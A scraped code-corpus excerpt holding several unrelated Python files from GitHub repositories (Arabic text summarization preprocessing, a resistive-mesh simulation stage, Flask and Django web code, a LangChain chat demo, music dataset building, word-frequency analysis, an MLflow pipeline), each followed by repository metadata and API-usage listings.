        length = sqrt(sum(value ** 2 for value in features.values()))
        if length != 0:
            scale = 1.0 / length
            for token in features:
                features[token] = features[token] * scale
    return features
def add_tfidf_to(documents):
    """Attach a normalized "tfidf" mapping to every document in place.

    Term frequency is relative within each document; idf is the natural
    log of (total documents / documents containing the token). Zero
    weights are dropped and each vector is scaled to unit length.
    """
    postings = {}  # token -> list of (document index, relative frequency)
    for idx, doc in enumerate(documents):
        doc["tfidf"] = {}
        words = doc.get("tokens", [])
        if not words:
            continue
        counts = {}
        for word in words:
            counts[word] = counts.get(word, 0) + 1
        total = len(words)
        for word, count in counts.items():
            postings.setdefault(word, []).append((idx, float(count) / total))
    num_docs = float(len(documents))
    for word, hits in postings.items():
        idf = log(num_docs / len(hits))
        for idx, rel_freq in hits:
            weight = rel_freq * idf
            if weight > 0:
                documents[idx]["tfidf"][word] = weight
    for doc in documents:
        doc["tfidf"] = normalize(doc["tfidf"])
def choose_cluster(node, cluster_lookup, edges):
    """Pick the cluster with the greatest total edge weight around *node*.

    Falls back to the node's current cluster when it has no edge list;
    ties on total weight are broken by first-seen cluster order.
    """
    if node not in edges:
        return cluster_lookup[node]
    totals = {}
    for neighbor, weight in edges.get(node, []):
        cluster = cluster_lookup[neighbor]
        totals[cluster] = totals.get(cluster, 0.0) + weight
    by_weight = {}
    for cluster, weight in totals.items():
        by_weight.setdefault(weight, []).append(cluster)
    return by_weight[max(by_weight)][0]
def majorclust(graph):
    """Run MajorClust label propagation over *graph*.

    Every node repeatedly adopts the dominant cluster among its
    neighbours; each (node, old, new) move is applied at most once so
    the loop terminates. Returns the node-id groups, one list per cluster.
    """
    labels = {node: idx for idx, node in enumerate(graph.nodes)}
    seen_moves = set()
    changed = True
    while changed:
        changed = False
        for node in graph.nodes:
            candidate = choose_cluster(node, labels, graph.edges)
            move = (node, labels[node], candidate)
            if candidate != labels[node] and move not in seen_moves:
                seen_moves.add(move)
                labels[node] = candidate
                changed = True
    groups = {}
    for node, label in labels.items():
        groups.setdefault(label, []).append(node)
    return groups.values()
def get_distance_graph(documents):
    """Build a pairwise similarity graph over the documents.

    Nodes are document indices; every unordered pair gets a symmetric
    edge weighted by cosine similarity, negative weights filtered out.
    """
    class Graph(object):
        def __init__(self):
            self.edges = {}
        def add_edge(self, n1, n2, w):
            # Keep only non-negative weights (guard added by original author).
            if w >= 0.0:
                self.edges.setdefault(n1, []).append((n2, w))
                self.edges.setdefault(n2, []).append((n1, w))
    graph = Graph()
    ids = range(len(documents))
    graph.nodes = set(ids)
    for left, right in combinations(ids, 2):
        graph.add_edge(left, right, cosine_distance(documents[left], documents[right]))
    return graph
def get_documents(string,ii):
    """Split document *ii* into sentences, dump the raw sentences to a
    JSON side-file, and return cleaned, stemmed per-sentence records.

    Each returned item is {"s_id", "text", "tokens"}: the sentence words
    minus punctuation/digits and stop-words, Snowball-stemmed.
    """
    # Local imports: sumy is only needed here for sentence segmentation.
    import sumy
    from sumy.parsers.plaintext import PlaintextParser
    from sumy.nlp.tokenizers import Tokenizer
    LANGUAGE="arabic"
    parser= PlaintextParser(string, Tokenizer(LANGUAGE)).document.sentences
    # Persist the raw sentence text keyed by sentence number.
    raw={}
    for s_no, sent in enumerate(parser):
        raw[s_no]=str(sent)
    with open(".../raw"+str(ii)+".json", "w",encoding = "utf-8") as write_file:
        json.dump(raw, write_file)
    # Redundant: the with-statement has already closed the file.
    write_file.close()
    li=[]
    for i in parser:
        i=str(i)
        # Strip punctuation/digits, drop stop-words, then stem each word.
        line = ''.join(c for c in i if c not in punctuation)
        line= remove_stopword(line)
        line=line.split()
        line=[ snowballStemmer(word) for word in line]#SnowballStemmerx
        li.append(line)
    docs=li
    return [{"s_id":s_id,"text": " ".join(text), "tokens": text} for s_id, text in enumerate(docs)]
'''Main program ...............................'''
def main(args):
    """For documents 1..153: compute per-sentence tf-idf vectors and
    pairwise nearest-neighbour similarity lists, saving both as JSON.
    """
    data_x={}  # NOTE(review): never used — dead variable.
    for ii in range(1,154):
        r_text=open(".../document"+str(ii)+".txt",'r', encoding='utf-8').read()
        documents = get_documents(r_text,ii)
        add_tfidf_to(documents)
        # Persist each sentence's tf-idf vector keyed by sentence id.
        senID={}
        for i in documents:
            senID[i['s_id']]=i['tfidf']
        with open(".../tfidf"+str(ii)+".json", "w",encoding = "utf-8") as write_file:
            json.dump(senID, write_file)
        write_file.close()
        dist_graph = get_distance_graph(documents)
        edges=dist_graph.edges
        s={}
        for k,result in list(edges.items()):
            # Sort each neighbour list by descending similarity.
            result.sort(key=lambda x: x[1])
            result.reverse()
            # Count non-zero similarities to derive a per-sentence density ratio.
            dn=[]
            for i in result:
                if i[1] != 0.0:
                    dn.append(i)
            ldn=len(dn)
            s[int(k)]=(result,ldn/len(documents))
        with open(".../nearest"+str(ii)+".json", "w",encoding = "utf-8") as write_file:
            json.dump(s, write_file)
        write_file.close()
        print("The end......(",ii,")")
if __name__ == '__main__':
    main(sys.argv)
| DrMustafa/GOA-Arabic-Text-Summarization | data_preprocessing.py | data_preprocessing.py | py | 5,696 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "string.punctuation",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "nltk.stem.snowball.ArabicStemmer",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "math.log... |
31865151145 | import numpy as np
import matplotlib.pyplot as plt
import copy
from run_stages.common_run_stage import CommonRunStage
from configuration.configuration_manager import Configuration
from configuration.models import Models
from utilities.image_processing_utilities import int_sq
class ResistiveMeshStage(CommonRunStage):
    """
    This class implements the logic for the resistive mesh stage while abiding by the structure required by the
    common run stage
    """
    def __init__(self, *args):
        # The mesh is computed lazily by run_stage(); None until then.
        super().__init__(*args)
        self.resistive_mesh = None
    def __str__(self):
        return "Resistive Mesh Stage"
    @property
    def stage_name(self):
        # Key under which this stage registers itself in the pipeline.
        return "resistive_mesh"
    @property
    def output_file_name(self):
        return [Configuration().params["r_matrix_output_file"]]
    def run_stage(self):
        """
        This function holds the execution logic for the resistive mesh stage
        :param args:
        :param kwargs:
        :return: the resistor mesh (also cached on self.resistive_mesh)
        """
        self.resistive_mesh = self._build_interconnected_mesh()
        # self.plot_resistive_mesh()
        return self.resistive_mesh
    @staticmethod
    def _build_interconnected_mesh():
        """
        This function is the heart of this stage.
        It converts the R matrix into a symmetric interconnected mesh of resistors
        :return: resistor mesh scaled by the configured conductivity
        """
        if Configuration().params["model"] == Models.MONOPOLAR.value:
            # load the non-diagonal entries of the R matrix. The first 3 columns are coordinates
            R = np.loadtxt(Configuration().params["r_matrix_input_file_non_diagonal"], delimiter=',')
            # load the diagonal entries of the R matrix. The first 2 columns are coordinates
            R_dia = np.loadtxt(Configuration().params["r_matrix_input_file_diagonal"], delimiter=',')
            # All potentials are referenced to the return mesh of the elementary field (column 3 of R_dia)
            R = R[:, 3:] - R_dia[:, 3]
            # Column 2 of R_dia contains the average potential on each active electrode.
            R_dia = R_dia[:, 2] - R_dia[:, 3]
            np.fill_diagonal(R, R_dia)
        if Configuration().params["model"] == Models.BIPOLAR.value:
            # load the axially symmetric field generated by a single active electrode
            dat_active = np.loadtxt(Configuration().params["r_matrix_input_file_active"], delimiter=',')
            # load the axially symmetric far field generated by a single return electrode
            dat_return = np.loadtxt(Configuration().params["r_matrix_input_file_return"], delimiter=',')
            # load the near field generated by a single return electrode
            dat_return_neighbor = np.loadtxt(Configuration().params["r_matrix_input_file_return_neighbor"], delimiter=',')
            # load the coordinates of all pixels
            px_pos = np.loadtxt(Configuration().params["r_matrix_input_file_px_pos"], delimiter=',')
            active_r = Configuration().params["active_electrode_radius"]
            return_w = Configuration().params["return_width"]
            px_size = Configuration().params["pixel_size"]
            N_px = px_pos.shape[0]
            # distance and potential from the center of an active electrode
            X_act = dat_active[0,:]
            V_act = dat_active[1,:]
            # distance and potential from the center of a return hexagon
            X_ret = dat_return[0,:]
            V_ret = dat_return[1,:]
            # determine the self-resistance of the active
            X_idx = X_act<active_r
            Rself_act = int_sq(X_act[X_idx], V_act[X_idx])
            # cross-pixel resistance from the return to the active of the same pixel
            Rself_ra = int_sq(X_ret[X_idx], V_ret[X_idx])
            # self-resistance of an return hexagon
            Rself_ret = dat_return_neighbor[0]
            # cross-pixel resistance from the return to the active of the same pixel
            # (ring radius derived from the hexagonal pixel geometry: tan(pi/6) term)
            return_r = px_size*(.5+np.tan(np.pi/6))/2
            X_idx = (X_ret<=return_r)&(X_ret>return_r-return_w)
            Rself_ar = int_sq(X_act[X_idx], V_act[X_idx])
            # interprelate far-field entries
            x_dist = px_pos[:,0].reshape((N_px, 1)) - px_pos[:,0].reshape((1, N_px))
            y_dist = px_pos[:,1].reshape((N_px, 1)) - px_pos[:,1].reshape((1, N_px))
            dist = np.sqrt(x_dist**2 + y_dist**2)
            R_act = np.interp(dist, X_act, V_act)
            R_ret = np.interp(dist, X_ret, V_ret)
            # cross-pixel resistance to a return hexagon from the 3 nearest neighbor returns
            # (neighbour rings are matched by distance with a 1E-3 tolerance)
            neighbor1_idx = np.abs(dist - px_size)<1E-3
            neighbor2_idx = np.abs(dist - 2*px_size)<1E-3
            neighbor3_idx = np.abs(dist - np.sqrt(3)*px_size)<1E-3
            R_ret[neighbor1_idx] = dat_return_neighbor[1]
            R_ret[neighbor2_idx] = dat_return_neighbor[2]
            R_ret[neighbor3_idx] = dat_return_neighbor[3]
            # cross-pixel resistance between active and return
            R12 = copy.deepcopy(R_act)
            R21 = copy.deepcopy(R_ret)
            np.fill_diagonal(R12, Rself_ar*np.ones(N_px))
            np.fill_diagonal(R21, Rself_ra*np.ones(N_px))
            np.fill_diagonal(R_act, Rself_act*np.ones(N_px))
            np.fill_diagonal(R_ret, Rself_ret*np.ones(N_px))
            # 2Nx2N impedance matrix
            R = np.concatenate((np.concatenate((R_act, R12)), np.concatenate((R21, R_ret))), axis=1)
        # force symmetry
        R = (R + R.T) / 2
        # convert the impedance matrix to resistor mesh. see [Z.C. Chen, et al, 2022] for the theory.
        G = np.linalg.inv(R)
        S = - G
        np.fill_diagonal(S, G.sum(axis=1))
        r_dual = 1 / S
        # NOTE(review): the 1E3 factor presumably converts units after the
        # conductivity scaling — confirm against the configuration docs.
        return r_dual / Configuration().params["r_matrix_conductivity"] * 1E3
    def plot_resistive_mesh(self):
        # Just for visualization of the resistors in the mesh. optional
        plt.plot(np.diag(self.resistive_mesh * 1E-6), label='$R_{n,n}$')
        plt.xlabel('Pixel Index')
        plt.ylabel('Resistance (M$\Omega$)')
        plt.legend()
| PalankerLab/RPSim | run_stages/resistive_mesh_stage.py | resistive_mesh_stage.py | py | 5,314 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "run_stages.common_run_stage.CommonRunStage",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "configuration.configuration_manager.Configuration",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "configuration.configuration_manager.Configuration",
... |
26104077495 | import connexion
import six
from swagger_server.models.meta_page import MetaPage # noqa: E501
from swagger_server.models.page import Page # noqa: E501
from swagger_server import util, const
from swagger_server.database import database
from swagger_server.controllers.exceptions import ExceptionHandler
from swagger_server.controllers import subpage_controller, layout_controller, social_controller
def create_page(login, pasword): # noqa: E501
    """Create a new page (swagger-generated stub, not yet implemented).

    Creates a blank project with one blank subpage; requires creating a
    new account (the user must provide login and password). # noqa: E501

    :param login: account login
    :type login: str
    :param pasword: account password (misspelled name kept as generated)
    :type pasword: str
    :rtype: Page
    """
    # TODO: implement; the generated stub only returns a placeholder.
    return 'do some magic!'
def get_page(id_page): # noqa: E501
    """Return the full page: meta + layout + socials + subpages.

    NOTE(review): the *id_page* argument is ignored — the page id is
    always const.DEFAULT_USER. Confirm whether per-id lookup is intended.
    Raises NotFoundException when no page row exists, and a
    ConnexionException when the page has no MetaPages row.

    :param id_page: id of page
    :type id_page: int
    :rtype: Page
    """
    id = const.DEFAULT_USER
    curr = database.conn.cursor(dictionary=True, buffered=True)
    curr.execute(f"SELECT * FROM Pages WHERE id = {id}",)
    a = curr.fetchone()
    if a is None:
        raise ExceptionHandler.NotFoundException
    curr.execute(f"SELECT * FROM MetaPages WHERE page = {id}")
    meta_query= curr.fetchone()
    curr.close()
    if meta_query is None:
        raise connexion.exceptions.ConnexionException()
    meta = MetaPage.from_dict(meta_query)
    # Assemble the remaining page sections from their dedicated controllers.
    layout = layout_controller.get_layout()[0]
    socials = social_controller.get_socials()
    subpages = subpage_controller.get_subpage_array()
    return Page(id=id, meta=meta,layout=layout,socials=socials, subpages=subpages)
def patch_meta_page(body): # noqa: E501
    """Modify the metadata of a page (swagger-generated stub).

    :param body: Meta information of page
    :type body: dict | bytes
    :rtype: MetaPage
    """
    # Deserialize the JSON request body when present; the actual update
    # logic is not implemented yet.
    if connexion.request.is_json:
        body = connexion.request.get_json() # noqa: E501
    return 'do some magic!'
| JakubKuderski/Programowanie_Zespolowe | server/swagger_server/controllers/page_controller.py | page_controller.py | py | 1,997 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "swagger_server.const.DEFAULT_USER",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "swagger_server.const",
"line_number": 37,
"usage_type": "name"
},
{
"api_name": "swagger_server.database.database.conn.cursor",
"line_number": 38,
"usage_type... |
# Get chat completions by passing one or more messages to the chat model.
from langchain.chat_models import ChatOpenAI # import chat model
from langchain.schema import (
    AIMessage, HumanMessage, SystemMessage) # type of message
from dotenv import dotenv_values
# Read the OpenAI API key from the local .env file (never hard-code secrets).
env_val = dotenv_values(".env")
openai_api_key = env_val["openai_api_key"]
# temperature=0 makes the model's responses deterministic.
chat = ChatOpenAI(openai_api_key=openai_api_key,
                  temperature=0) # init chat model
# Get a completion by passing a single human message.
single_res = chat([HumanMessage(
    content="Translate this sentence from English to Amharic. I love programing.")])
# print(single_res)
# Multiple messages: a system prompt plus a user question.
# NOTE(review): the prompt strings below contain typos ("Your are",
# "help full", "programing") — left untouched as they are runtime data.
messages = [
    SystemMessage(
        content="Your are a help full assistant that translates English to Amharic"),
    HumanMessage(content="whos pen is this ?")
]
multiple_message = chat(messages)
print(multiple_message)
| bakiwebdev/langchain-local-experment | message_completions_from_a_chat_model.py | message_completions_from_a_chat_model.py | py | 882 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "dotenv.dotenv_values",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "langchain.chat_models.ChatOpenAI",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "langchain.schema.HumanMessage",
"line_number": 15,
"usage_type": "call"
},
{
... |
3766678139 | import json
import os
# Length of each training input window (in symbols).
SEQUENCE_LENGTH = 64
# Raw per-song dataset directory, the merged single-file dataset, and the
# symbol -> integer vocabulary mapping file.
DATASET_PATH = './dataset'
SINGLE_FILE_DATASET_PATH = 'file_dataset'
MAPPING_PATH = 'mapping.json'
def load(file_path):
    """Read a song file and return its full contents as one string."""
    with open(file_path, 'r') as handle:
        return handle.read()
def save(songs, file_dataset_path):
    """Write the songs string to *file_dataset_path*, overwriting any content."""
    with open(file_dataset_path, 'w') as handle:
        handle.write(songs)
def create_single_file_dataset(dataset_path, file_dataset_path, sequence_length):
    """Concatenate every encoded song under *dataset_path* into one file.

    Songs are joined with sequence_length "/ " delimiter tokens; the
    combined string (trailing space stripped) is saved and returned.
    """
    delimiter = '/ ' * sequence_length
    pieces = []
    for path, _, files in os.walk(dataset_path):
        for name in files:
            song = load(os.path.join(path, name))
            pieces.append(song + " " + delimiter)
    songs = "".join(pieces)[:-1]
    save(songs, file_dataset_path)
    return songs
def create_mapping(songs, mapping_path):
    """Write a symbol -> integer vocabulary mapping for *songs* as JSON."""
    vocabulary = list(set(songs.split()))
    mappings = {symbol: index for index, symbol in enumerate(vocabulary)}
    with open(mapping_path, 'w') as handle:
        json.dump(mappings, handle, indent=4)
def convert_into_int(songs):
    """Map each symbol of *songs* to its integer id from the mapping file."""
    with open(MAPPING_PATH, 'r') as handle:
        mappings = json.load(handle)
    return [mappings[symbol] for symbol in songs.split()]
def generate_training_data(sequence_length):
    """Build (input window, next symbol) training pairs.

    Slides a window of *sequence_length* symbols across the encoded
    single-file dataset; each window's target is the symbol following it.
    """
    encoded = convert_into_int(load(SINGLE_FILE_DATASET_PATH))
    num_sequences = len(encoded) - sequence_length
    inputs = [encoded[i:sequence_length + i] for i in range(num_sequences)]
    targets = [encoded[sequence_length + i] for i in range(num_sequences)]
    print(f'there are {num_sequences} of training data')
    return inputs, targets
if __name__ == '__main__':
    # Build the merged dataset, derive the vocabulary mapping, then
    # produce the (input window, next symbol) training pairs.
    songs = create_single_file_dataset(DATASET_PATH, SINGLE_FILE_DATASET_PATH, SEQUENCE_LENGTH)
    create_mapping(songs, MAPPING_PATH)
    inputs, targets = generate_training_data(SEQUENCE_LENGTH)
| Jiangyuliang0813/MusicGeneration | datasetbuilding.py | datasetbuilding.py | py | 2,007 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.walk",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "json.dump",
"line_number": 41,
... |
38420632726 | """
Creates a single-page HTTP server
"""
import os
from flask import Flask, request
def create_app(test_config=None):
    """Application factory: build, configure and start the Flask app.

    NOTE(review): this factory starts the development server itself via
    app.run() and never returns the app object — callers expecting the
    usual factory contract (a returned app) should confirm this is
    intentional.
    """
    # create and configure the app
    app = Flask(__name__, instance_relative_config=True)
    app.config.from_mapping(
        SECRET_KEY='dev',
        DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),
    )
    if test_config is None:
        # load the instance config, if it exists, when not testing
        app.config.from_pyfile('config.py', silent=True)
    else:
        # load the test config if passed in
        app.config.from_mapping(test_config)
    # ensure the instance folder exists
    try:
        os.makedirs(app.instance_path)
    except OSError:
        # Folder already exists (or cannot be created); proceed either way.
        pass
    # a simple page that says hello
    @app.route('/', methods=['GET'])
    def hello():
        return 'HELLO'
    # echo endpoint: logs and returns the raw posted request body
    @app.route('/', methods=['PUT', 'POST'])
    def update():
        print(request.data)
        return request.data
    app.run(debug=True, use_reloader=False)
| Cy83rr/web_monitor | src/web_monitor/server/server.py | server.py | py | 1,031 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number"... |
38906742448 | import math
from numpy import ndarray, array
from scipy.spatial.transform import Rotation
from .GeoShape import GeoShape
from src.pyLiveKML.KML.GeoCoordinates import GeoCoordinates
from src.pyLiveKML.KML.KML import AltitudeMode
def ellipse_gen(
    x_rad: float, y_rad: float, rotation: Rotation = None, num_v: int = 32
) -> ndarray:
    """Yield *num_v* evenly spaced 3-D vertices of an ellipse in the z=0 plane.

    :param x_rad: semi-axis length along x.
    :param y_rad: semi-axis length along y.
    :param rotation: optional rotation applied to every vertex.
    :param num_v: number of vertices, starting at angle 0 (point (x_rad, 0, 0)).
    :return: generator of numpy arrays of shape (3,).
    """
    step = 2 * math.pi / num_v
    for i in range(num_v):
        # Derive the angle directly from the index instead of accumulating
        # `step` each iteration — avoids floating-point drift for large num_v.
        angle = i * step
        point = array([x_rad * math.cos(angle), y_rad * math.sin(angle), 0])
        if rotation is not None:
            point = rotation.apply(point)
        yield point
class GeoEllipse(GeoShape):
    """A GeoShape whose outer boundary is an ellipse produced by `ellipse_gen`.

    The vertices are generated around `origin` in the z=0 plane and may be
    rotated before being handed to the GeoShape base class as the outer bound.
    """
    def __init__(
        self,
        origin: GeoCoordinates,
        x_radius: float,
        y_radius: float,
        rotation: Rotation = None,
        num_vertices: int = 32,
        border_width: float = 1.0,
        border_color: int = 0xFFFFFFFF,
        fill_color: int = 0xFFFFFFFF,
        name: str = None,
        selected: bool = False,
        altitude_mode: AltitudeMode = AltitudeMode.CLAMP_TO_GROUND,
    ):
        # Materialise the generator: GeoShape receives a concrete vertex list.
        # No inner bounds — an ellipse has no holes.
        GeoShape.__init__(
            self,
            origin=origin,
            outer_bound=list(ellipse_gen(x_radius, y_radius, rotation, num_vertices)),
            inner_bounds=None,
            border_width=border_width,
            border_color=border_color,
            fill_color=fill_color,
            name=name,
            selected=selected,
            altitude_mode=altitude_mode,
        )
| smoke-you/pyLiveKML | evals/apps/geometry/GeoEllipse.py | GeoEllipse.py | py | 1,476 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "scipy.spatial.transform.Rotation",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "math.pi",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "math.cos",
... |
9396196983 | from collections import Counter
from collections import defaultdict
from nltk.corpus import stopwords
from wordcloud import WordCloud
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from preprocess import process_text_data
from utils import load_epub
def get_word_frequency_information(book):
    """Count non-stopword word frequencies per chapter and persist them.

    :param book: mapping of chapter -> iterable of sentences (str).
    :return: DataFrame with columns ['chapter', 'word', 'frequency'], also
             written to ./output/dataframes/q2-word_frequency_information.csv
    """
    book_bow = defaultdict(list)
    # Membership tests against a set are O(1); the raw stopwords *list* made
    # the innermost loop scan ~180 entries for every single word.
    stopword = set(stopwords.words('english'))
    for chapter, text in book.items():
        for sentence in text:
            for word in sentence.split():
                if word in stopword:
                    continue
                book_bow[chapter].append(word)
    chapters = list()
    words = list()
    frequencies = list()
    # Flatten per-chapter Counters into parallel columns.
    for chapter, bow in book_bow.items():
        counter = Counter(bow)
        for word, frequency in counter.most_common():
            chapters.append(chapter)
            words.append(word)
            frequencies.append(frequency)
    word_frequency_information = pd.DataFrame(
        zip(
            chapters,
            words,
            frequencies
        ),
        columns=['chapter', 'word', 'frequency']
    )
    word_frequency_information.to_csv(
        './output/dataframes/q2-word_frequency_information.csv',
        index=False, encoding='utf-8'
    )
    return word_frequency_information
def get_top_word_frequency_information(word_freq_info, topn=100):
    """Aggregate per-chapter frequencies and keep the *topn* words overall.

    The result is sorted by total frequency (descending) and also written to
    ./output/dataframes/q2-top_word_frequency_information.csv
    """
    unique_words = word_freq_info.word.unique()
    per_word_totals = word_freq_info.groupby(by='word').sum()
    # Reindex by first-appearance order before sorting by total frequency.
    total_frequencies = per_word_totals.loc[unique_words, 'frequency'].values
    top_word_freq_info = pd.DataFrame(
        zip(unique_words, total_frequencies),
        columns=['word', 'frequency']
    )
    top_word_freq_info = top_word_freq_info.sort_values(
        by='frequency', ascending=False, ignore_index=True
    ).head(topn)
    top_word_freq_info.to_csv(
        './output/dataframes/q2-top_word_frequency_information.csv',
        index=False, encoding='utf-8'
    )
    return top_word_freq_info
def draw_barplot_top_word_frequency_information(top_word_freq_info, badwords):
    """Bar plot of top-word frequencies with *badwords* highlighted in red."""
    is_badword = top_word_freq_info.word.isin(badwords)
    badword_index = top_word_freq_info[is_badword].index
    non_badword_index = top_word_freq_info[~is_badword].index
    plt.figure(figsize=(12, 9))
    # Red bars for the flagged words, blue for everything else.
    plt.bar(
        x=badword_index,
        height=top_word_freq_info.loc[badword_index, 'frequency'],
        color='r', label='badwords{goddam, hell, damn, bastard}'
    )
    plt.bar(
        x=non_badword_index,
        height=top_word_freq_info.loc[non_badword_index, 'frequency'],
        color='b'
    )
    plt.legend()
    plt.xticks([])
    plt.xlabel('word')
    plt.ylabel('frequency')
    plt.title('Top Word Frequency Distribution. (feat. badwords)')
    plt.savefig('./output/figures/q2-top_word_frequency.png')
def draw_wordcloud_top_word_frequency_information(top_word_freq_info):
    """Render the top words as a word cloud and save it as a PNG."""
    word_freq = dict(zip(
        top_word_freq_info['word'], top_word_freq_info['frequency']
    ))
    # Fixed random_state keeps the layout reproducible between runs.
    cloud = WordCloud(
        width=800,
        height=800,
        background_color='white',
        max_words=1000,
        contour_width=3,
        contour_color='firebrick',
        random_state=2020
    ).generate_from_frequencies(word_freq)
    plt.figure(figsize=(12, 12))
    plt.imshow(cloud)
    plt.xticks([])
    plt.yticks([])
    plt.axis('off')
    plt.title('WordCloud for Top Words in Novel')
    plt.savefig('./output/figures/q2-top_word_frequency_wordcloud.png')
if __name__ == "__main__":
    # Source EPUB of the novel being analysed.
    epub_path = \
        './ebook/J. D. Salinger - The Catcher in the Rye '\
        '(1951, Penguin Books Ltd).epub'
    book = load_epub(epub_path)
    book = process_text_data(book)
    # Per-chapter counts, then the 200 most frequent words overall.
    word_freq_info = get_word_frequency_information(book)
    top_word_freq_info = get_top_word_frequency_information(
        word_freq_info, topn=200
    )
    badwords = ['goddam', 'hell', 'damn', 'bastard']
    draw_barplot_top_word_frequency_information(top_word_freq_info, badwords)
    draw_wordcloud_top_word_frequency_information(top_word_freq_info)
| dhsong95/the-catcher-in-the-rye | question2.py | question2.py | py | 4,122 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.defaultdict",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords",
"line_number": 17,
"usage_type": "name"
},
{
"api_nam... |
19801286548 | from django.urls import path
from . import views
# URL routes for the aluno app; the bare root reuses the login view.
urlpatterns =[
    path('',views.login,name='index_login'),
    path('login/',views.login,name='login'),
    path('logout/',views.logout,name='logout'),
    # 'cadastrar' = user registration
    path('cadastrar/',views.cadastrar,name='cadastrar'),
    path('dashboard/',views.dashboard,name='dashboard')
]
{
"api_name": "django.urls.path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
13732329032 | # -*- coding: utf8 -*-
from flask_login import current_user
from app import sa
from app.models import Base
from app.helpers import ModelHelper, MutableObject
import datetime
class Comment(Base, sa.Model, ModelHelper):
    """A user comment on a post; supports one level of threading via comment_id.

    comment_id == 0 marks a top-level comment; otherwise it is the id of the
    parent Comment. __json_meta__ lists the fields exposed when serialising.
    """
    __tablename__ = 'comments'
    __json_meta__ = [
        'id',
        'text',
        'profile',
        'post_id',
        'comment_id',
        'children',
        'created_at',
        'modified_at'
    ]
    id = sa.Column(sa.Integer, primary_key=True)
    post_id = sa.Column(sa.Integer,
                        sa.ForeignKey('posts.id',
                                      ondelete='CASCADE',
                                      onupdate='NO ACTION'))
    user_id = sa.Column(sa.Integer,
                        sa.ForeignKey('users.id',
                                      ondelete='CASCADE',
                                      onupdate='NO ACTION'))
    # 0 = top-level comment, otherwise the parent comment's id
    comment_id = sa.Column(sa.Integer, default=0, index=True, nullable=False)
    text = sa.Column(sa.Text)
    created_at = sa.Column(sa.DateTime, default=datetime.datetime.utcnow)
    modified_at = sa.Column(sa.DateTime, default=datetime.datetime.utcnow)
    def __repr__(self):
        return '<Comment %s>' % (self.id)
    @property
    def parent_comment(self):
        """Lazily fetch and cache the parent Comment (None for top-level)."""
        if not self.comment_id:
            return None
        if not hasattr(self, '_parent_comment'):
            self._parent_comment = Comment.get_by_id(self.comment_id)
        return self._parent_comment
    @property
    def profile(self):
        """Cached, serialisable summary of the comment author."""
        if not hasattr(self, '_profile'):
            self._profile = {
                'id': self.user_id,
                'nickname': self.user.nickname,
                'profile_picture_url': self.user.profile_picture_url
            }
        return self._profile
    @property
    def can_edit(self):
        """True if the current user is the author or an admin.

        NOTE(review): uses `self.user.id` while can_delete uses `self.user_id`
        — presumably equivalent via the relationship; confirm intentional.
        """
        return (current_user.is_authenticated and
                (self.user.id == current_user.id or current_user.is_admin))
    @property
    def can_delete(self):
        """True for the comment author, the post owner, or an admin."""
        return (current_user.is_authenticated and
                (self.user_id == current_user.id or
                 self.post.user_id == current_user.id or
                 current_user.is_admin))
    @property
    def need_reply(self):
        """True when a logged-in user other than the author views the comment."""
        return current_user.is_authenticated and self.user_id != current_user.id
    @property
    def children(self):
        """Lazily-initialised list of child comments (filled by the setter)."""
        if not hasattr(self, '_children'):
            self._children = []
        return self._children
    @children.setter
    def children(self, value):
        self._children = value
| tabaresjc/HeadUP | app/models/comments/comment.py | comment.py | py | 2,541 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "app.models.Base",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "app.sa.Model",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "app.sa",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "app.helpers.ModelHelper",
... |
73826277794 | """
Main function to run the script of the pipeline
Author: Arkaan Quanunga
Date: 03/03/2022
"""
import os
import tempfile
import mlflow
import hydra
import omegaconf
# The Steps this pipeline will run- edit this based on local machine vs S3
# storage
# Ordered list of pipeline steps executed when main.steps == "all".
_steps = [
    # Comment this line out if you don't have any data on local machine &
    # already have data present on S3
    # "data_upload_S3",
    "data_upload",
    "data_processing",
    "database_upload"
]
@hydra.main(config_name='config')
def run_pipeline(config: omegaconf.DictConfig):
    """
    Run the selected pipeline steps as individual MLflow projects.

    :param config: hydra-resolved configuration (see config.yaml); the
        'main.steps' entry is either "all" or a comma-separated step list.
    :return: None
    """
    # Set up the wandb experiment. All runs will be grouped under this name
    os.environ["WANDB_PROJECT"] = config["main"]["project_name"]
    os.environ["WANDB_RUN_GROUP"] = config["main"]["experiment_name"]
    # Steps to execute
    steps_par = config['main']['steps']
    active_steps = steps_par.split(",") if steps_par != "all" else _steps
    # Move to a temporary directory (tmp_dir itself is currently unused by the
    # steps but keeps any mlflow scratch files out of the project tree)
